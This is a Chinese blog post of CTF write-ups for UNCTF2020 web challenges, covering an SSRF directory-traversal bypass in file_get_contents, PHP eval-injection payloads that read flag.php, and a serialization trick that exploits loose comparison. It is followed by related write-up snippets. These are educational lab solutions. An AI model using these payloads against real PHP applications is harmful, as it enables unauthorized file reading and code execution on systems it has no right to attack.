UNCTF2020 | Web Wp

最新推荐文章于 2020-11-25 10:21:11 发布
最新推荐文章于 2020-11-25 10:21:11 发布
阅读量2.4k 收藏 9
点赞数 4
分类专栏: CTF_Writeup 文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/109555135
版权

文章目录

Web

0x01:easy_ssrf

在这里插入图片描述

代码很简单,参数中要有unctf.com,而且过滤了php|file|zip|bzip|zlib|base|data,导致很多协议用不了,查了查资料发现涉及到SSRF file_get_contents函数都是利用的file协议等,一开始也没思路要怎么绕过去。

然后查了一篇师傅的博客记载了一个SSRF的一个黑魔法:

当PHP的 file_get_contents() 函数在遇到不认识的伪协议头时候会将伪协议头当做文件夹,造成目录穿越漏洞,这时候只需不断往上跳转目录即可读到根目录的文件。这个方法可以在SSRF的众多协议被ban的情况下来进行读取文件

在这里插入图片描述
发现确实可以造成目录穿越,直接读取下flag
在这里插入图片描述

0x02:babyeval

在这里插入图片描述
过滤了带括号的函数,可以使用echo进行输出内容,通过include包含flag.php,再输出变量即可(感觉是非预期,因为ob_start函数没有用到)

payload:

?a=include "flag.php";echo $flag;

ob_start([string output_callback])- 打开输出缓冲区,所有的输出信息不在直接发送到浏览器,而是保存在输出缓冲区里面,可选得回调函数用于处理输出结果信息。

这道题设置的是输出信息中不能存在flag,所以可以利用编码绕过

?a=echo `base64 flag.php`;

在这里插入图片描述
也可以通过include+伪协议去读取

?a=include 'php://filter/read=convert.base64-encode/resource=./flag.php';
0x03:ezphp

在这里插入图片描述

bool类型的true跟任意字符串可以弱类型相等。因此我们可以构造bool类型的序列化数据 ,无论比较的值是什么,结果都为true

payload:

<?php
error_reporting(0);
$shy='';
$shy=array("username"=>1,"password"=>1);
echo var_dump($shy);
echo var_dump(serialize($shy));
 
$shy='';
$shy=array("username"=>true,"password"=>true);
echo var_dump($shy);
echo var_dump(serialize($shy));
?>

在这里插入图片描述

0x04:easy_upload

最低0.47元/天 解锁文章
lemonl1
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
2020UNCTF-MISC-网络深处1
zippo1234的博客
11-15 583
2020UNCTF-MISC-网络深处1网络深处1题目分析开始1.题目2.dtmf3.录音分析4.tupper自引用公式5.get flag结语 每天一题,只能多不能少 网络深处1 题目分析 近期琐事杂多,就用前些天unctf的题来凑数吧。 dtmf 频谱图 tupper自引用公式 开始 1.题目 给出三个文件:网络深处1-1_可疑的号码.txt、网络深处1-2_电话录音.zip、拨号音.wav 题目内故事纯属虚构,完全架空。 你是一名学生,你在夜间路过一个电话亭,一个人鬼鬼祟祟的进入电话亭拨通了一个
UNCTF2020部分wp
楼阁de猫的博客
11-28 280
目录MISC你能破解我的密码吗 MISC 你能破解我的密码吗 拿到一个shadow文件,这是一个Linux下的文件,用记事本打开发现有一串奇怪的东西 百度一个这个shadow文件 我们这里的id=1,说明是md5加密的 话不多少我们开始破解密码,这里有一篇文章几乎是一模一样 /etc/shadow文件破解,密码破解,md5,SHA256,SHA512破解 具体的操作也是相同,我也是在kali里面下载的,但是我的kali似乎不能连接到下载链接,所以我是在Windows里面下载好了john-1.9.0.ta
UNCTF2020web方向部分题解
bmth666的博客
11-18 1656
文章目录Web方向easy_ssrfeasyflask俄罗斯方块人大战奥特曼easyunserializebabyevalezphpeasy_uploadUN's_online_toolsezfind其他的题目的一些思路:checkin-sql:easyphpWeb方向 easy_ssrf php遇到不认识的协议就会当目录处理 ?url=0://unctf.com/../../../../../../../../flag easyflask SSTI/沙盒逃逸详细总结 SSTI模板注入及绕过姿势(基
UNCTF2020 wp
l11III1111的博客
11-15 1772
WEB easy_ssrf 进到页面显示源代码,过滤了一些协议。可以用取反绕过伪协议的限制。 #构造paylaod echo urlencode(~('file:///')).'unctf.com/../../../../../../flag'; #%99%96%93%9A%C5%D0%D0%D0unctf.com/../../../../../../flag easyunserialize __wakeup()函数里判断password是否等于easy,是的话输出flag。 但是password我
unctf2020部分wp
xiaolong22333的博客
11-14 1259
第一次做出了这么多题,个人感觉还行。 文章可能有点长,但都是一些简单的题,大佬的话快速浏览一下就可以啦。 Web easy_ssrf <?php echo'<center><strong>welc0me to 2020UNCTF!!</strong></center>'; highlight_file(__FILE__); $url = $_GET['url']; if(preg_match('/unctf\.com/',$url)){
UNCTF2021 部分wp.pdf
12-10
本文档对 UNCTF2021 部分 WP 进行了详细的解题报告,涵盖了 WEBPHP、MYSQL、CRYPTO 等方面的知识点。 1. Fuzz_md5Get 和 Post 传参绕过 在 UNCTF2021 的 WEB 部分中,我们遇到了一个 fuzz_md5Get 的问题,需要...
UNCTF misc 和crypot的wp
最新发布
11-09
UNCTF misc 和crypot的wp
UNCTF2021WP.pdf
12-10
UNCTF2021WP.pdf
2020易霖博杯 web wp.md
04-02
2020易霖博杯 web wp. 参照大佬们比较好的思路写的WP 方便学习
wpWeb服务编程案例
04-03
在Windows Phone(简称WP)平台上,开发者可以利用Web服务编程技术来创建强大的应用程序,与远程服务器进行数据交换,实现丰富的功能。本案例旨在探讨如何在Windows Phone设备上开发Web服务应用,通过集成Web服务,...
UNCTF2020 web writeup
b1ackc4t的博客
11-18 509
1.Easy_ssrf 给了file_get_contents,直接读取flag即可 2.Easyunserialize 利用点在 构造uname反序列化逃逸即可 3.Babyeval 两个过滤,绕过括号和flag即可 用include绕过 Base64解码得到flag 4.Easyflask 开局让我以管理员登陆 盲猜有/login,随便输入账号密码 提示我去/register注册 注册个adm...
unctf2020——Crypto
weixin_44223136的博客
11-25 478
Crypto复现一、鞍山大法官开庭之缺的营养这一块怎么补二、easy_rsa 复现 一、鞍山大法官开庭之缺的营养这一块怎么补 根据给出的密文:ottttootoootooooottoootooottotootttootooottotttooootttototoottooootoooottotoottottooooooooottotootto 可以看出密文只有两种字母,可以想到使用的可能会是培根密码。 因此可以有o=A,t=B或者o=B,t=A两种可能。 两种可能解码为PEIGENHENYOUYINGYANG
unctf2020部分题解
tansty_zh的博客
11-15 3972
unctf2020 **是团队中人写的wp,本人经其同意进行转载 友联:https://www.cnblogs.com/Jlay/p/unctf_2020.html** ⭐misc 1、baba_is_you 题目告诉我们,了解png文件格式。 下载得到一张png格式的图片。 用010editor打开查看,发现最后含有一个B站网址 https://www.bilibili.com/video/BV1y44111737 访问,查看评论区得到flag flag: unctf{let
2020UNCTF writteup 部分题解(MISC,CRPTO)
fightte的博客
11-23 414
2020UNCTF writteup 部分题解(MISC,CRPTO) 开头: 之前打完了2020年的UNCTF,当然7天学了很多,打了很久,现在分享几道题,记录一下: REVERSE:(逆向) 1. 将下载的exe文件放入ida进行反编译: 查看框体图,明显看到下面分支有一个判断。通过伪代码也可以看出: 进入str2可以看出str2里有疑似flag的数据,按r键改成字符串: 就是flag! CRYPTO: hint提示到:大法官很缺营养:在查询CTF常用密码时,看到了培根密码,暗示此题
UNCTF2020 部分题目总结
Scarehehe的博客
11-20 607
UNCTF2020 部分题目总结
UNCTF2020的奇妙之旅-----Crypto&Misc部分wp
laffey的博客
11-16 1242
UNCTF2020的奇妙经历-----Crypto&Misc部分wp Crypto 1.easy_rsa 题目: from Crypto.Util import number import gmpy2 from Crypto.Util.number import bytes_to_long p = number.getPrime(1024) q = number.getPrime(1024) if p > q: a = p + q b = p - q print(a,
UNCTF2020 misc crypto部分题目
wu_zh1_hui的博客
11-15 780
1.baba_is_you 下载下来是一张png图片 提示看十六进制码,用notepad++打开拉到最后发现网址 跳转过去评论区第一个评论就是flag:unctf{let’s_study_pwn} 2.阴阳人编码 下载下来是txt文件,打开发现阴阳怪气 看到三种标点! . ? 猜测是Ook密码,把中文替换成Ook,再把问号正过来,直接上在线解密网站得到 https://www.splitbrain.org/services/ook flag{9_zhe_Jiu_zhe_8_hui_8} 3.爷的
buuctf web [BJDCTF2020]EzPHP
qq_40327508的博客
03-12 2828
进入后是这样的 查看源代码发现注释 base32解码得到1nD3x.php,发现是源码 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; e...
WUSTCTF2020 web题 --- 大人, 时代变了
qq_42436176的博客
07-19 4819
文章目录0x0 前言0x1 前端审计抓包逻辑分析解密算法0x2 验证码识别分析验证码处理特征提取0x3 代理池0x4 全部代码主体特征点0x5 题目源码前端App.tsxDrawer.tsx后端views.pyutils.pymodels.py 0x0 前言 出这个题的本意是看到CTF的web题老是PHP什么的, 感觉和现实情况有点脱节, 且对前端审计没有太大的要求, 于是出了这个"现代"一点的题. 这个题目模拟的是爬虫, 在多次请求后将会出现验证码, 再频繁访问将会封锁ip, 且网站是使用React写的,
UNCTF2021 Web与Crypto挑战解析
"UNCTF2021 部分wp.pdf" 本文档是关于UNCTF2021网络安全竞赛的一些解题心得与解决方案,主要涵盖了WEB、Reserve和Crypto三个领域的挑战。 1. WEB挑战 (1) fuzz_md5 这个挑战涉及到MD5碰撞和preg_replace漏洞的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值